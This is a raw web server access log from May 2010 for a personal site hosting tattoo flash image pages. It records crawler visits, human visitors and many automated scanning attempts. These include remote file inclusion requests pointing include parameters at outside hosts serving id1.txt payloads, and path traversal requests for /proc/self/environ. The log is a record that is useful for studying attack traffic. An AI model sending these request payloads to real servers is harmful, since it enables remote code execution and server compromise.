124.115.6.16 - - [02/May/2010:13:12:19 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Sosospider+(+http://help.soso.com/webspider.htm)"
81.208.34.38 - - [02/May/2010:13:12:38 -0500] "GET //adminhead.php?path[docroot]=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:13:12:55 -0500] "GET /logs/access_log.1265414400//adminhead.php?path[docroot]=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:13:12:55 -0500] "GET /logs//adminhead.php?path[docroot]=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:13:13:09 -0500] "GET /logs/access_log.1265932800//adminhead.php?path[docroot]=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:13:13:18 -0500] "GET //adminhead.php?path[docroot]=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:13:13:18 -0500] "GET /logs//adminhead.php?path[docroot]=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:13:13:18 -0500] "GET /logs/access_log.1270598400//adminhead.php?path[docroot]=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.46.199.196 - - [02/May/2010:13:13:33 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.93.138.214 - - [02/May/2010:13:15:46 -0500] "GET /logs/%22*/orderSuccess.inc.php?glob=1%22' HTTP/1.1" 404 312 "-""libwww-perl/5.831"
81.93.138.214 - - [02/May/2010:13:15:46 -0500] "GET /%22*/orderSuccess.inc.php?glob=1%22' HTTP/1.1" 404 307 "-""libwww-perl/5.831"
81.167.65.30 - - [02/May/2010:13:16:39 -0500] "GET //ws/login.php?noSet=0&includedir=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:13:16:39 -0500] "GET /logs//ws/login.php?noSet=0&includedir=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:13:16:39 -0500] "GET /logs/access_log.1231718400%20%20//ws/login.php?noSet=0&includedir=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:13:16:39 -0500] "GET /logs/access_log.1217808000%20%20//ws/login.php?noSet=0&includedir=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:13:24:13 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:13:24:14 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:13:24:18 -0500] "GET /logs/access_log.1268611200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:13:24:48 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:13:24:48 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:13:24:52 -0500] "GET /logs/access_log.1268611200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
67.218.116.163 - - [02/May/2010:13:25:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
75.136.121.230 - - [02/May/2010:13:25:04 -0500] "GET /logs/access_log.1270684800%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:13:25:08 -0500] "GET /artwork/tombio.htm HTTP/1.1" 404 302 "-""Yandex/1.01.001 (compatible; Win16; I)"
75.136.121.230 - - [02/May/2010:13:25:41 -0500] "GET /logs/access_log.1270684800%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
207.46.195.226 - - [02/May/2010:13:27:55 -0500] "GET /logs/access_log.1181001600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.6.154.57 - - [02/May/2010:13:29:45 -0500] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
200.6.154.57 - - [02/May/2010:13:30:00 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
75.136.121.230 - - [02/May/2010:13:30:31 -0500] "GET /logs/access_log.1266278400/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:13:30:31 -0500] "GET /logs/access_log.1264723200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:13:30:34 -0500] "GET /logs/access_log.1264723200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
75.136.121.230 - - [02/May/2010:13:30:44 -0500] "GET /logs/access_log.1266278400/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/111/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:13:31:09 -0500] "GET //administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:13:31:09 -0500] "GET /logs//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:13:31:09 -0500] "GET /logs/access_log.1270684800%20%20//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 384 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:13:31:30 -0500] "GET //administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:13:31:30 -0500] "GET /logs//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:13:31:30 -0500] "GET /logs/access_log.1270684800//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
207.46.13.49 - - [02/May/2010:13:31:55 -0500] "GET /logs/access_log.1223510400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.208.34.38 - - [02/May/2010:13:32:51 -0500] "GET /logs/access_log.1270684800//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
81.208.34.38 - - [02/May/2010:13:33:25 -0500] "GET /logs/access_log.1270684800%20%20//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 384 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:13:41:47 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yandex/1.01.001 (compatible; Win16; I)"
71.198.188.143 - - [02/May/2010:13:48:24 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.bing.com/images/search?q=tattoo+FLASH&go=&form=QBIR&qs=AS&sk=SQ1AS4&pq=tattoo+flash&sp=6&sc=8-12""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
71.198.188.143 - - [02/May/2010:13:48:25 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
71.198.188.143 - - [02/May/2010:13:48:29 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://www.bing.com/images/search?q=tattoo+FLASH&go=&form=QBIR&qs=AS&sk=SQ1AS4&pq=tattoo+flash&sp=6&sc=8-12""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
67.195.112.180 - - [02/May/2010:13:53:29 -0500] "GET /logs/access_log.1175731200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
78.110.50.139 - - [02/May/2010:13:57:31 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:13:57:31 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:13:57:32 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:13:57:32 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:13:57:36 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:13:57:37 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
210.245.85.109 - - [02/May/2010:13:58:17 -0500] "GET /logs/access_log.1263168000////?_zb_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
210.245.85.109 - - [02/May/2010:13:58:17 -0500] "GET ////?_zb_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
210.245.85.109 - - [02/May/2010:13:58:17 -0500] "GET /logs////?_zb_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 200 4000 "-""Mozilla/5.0"
207.46.13.85 - - [02/May/2010:13:59:25 -0500] "GET /logs/access_log.1167436800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
173.83.250.21 - - [02/May/2010:13:59:32 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
173.83.250.21 - - [02/May/2010:13:59:32 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
173.83.250.21 - - [02/May/2010:13:59:33 -0500] "GET //poll/poll_ssi.php?include_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
173.83.250.21 - - [02/May/2010:13:59:45 -0500] "GET /logs/access_log.1270684800%20%20//poll/poll_ssi.php?include_path=http://christenplein.com/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
75.136.101.43 - - [02/May/2010:14:00:07 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:00:07 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:00:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:00:47 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:00:54 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:00:54 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:00:54 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:00:54 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:00:54 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:00:54 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:00:54 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:00:54 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:00:54 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:00:54 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:00:55 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
67.195.112.180 - - [02/May/2010:14:01:18 -0500] "GET /logs/access_log.1228176000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.136.101.43 - - [02/May/2010:14:01:22 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:22 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:22 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:22 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:22 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:22 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:22 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:22 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:24 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:24 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:25 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:41 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:42 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:42 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:42 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:42 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:42 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:42 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:42 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:42 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:42 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:01:42 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
207.46.195.239 - - [02/May/2010:14:01:54 -0500] "GET /logs/access_log.1240531200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.136.101.43 - - [02/May/2010:14:02:06 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:02:06 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:02:06 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:02:06 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:02:06 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:02:06 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:02:06 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:02:06 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:02:07 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:02:07 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
75.136.101.43 - - [02/May/2010:14:02:07 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
87.250.255.243 - - [02/May/2010:14:02:08 -0500] "GET /artwork/miscellaneous.htm HTTP/1.1" 404 309 "-""Yandex/1.01.001 (compatible; Win16; I)"
75.136.101.43 - - [02/May/2010:14:02:24 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100325 Ubuntu/9.04 (jaunty) Firefox/3.6.3"
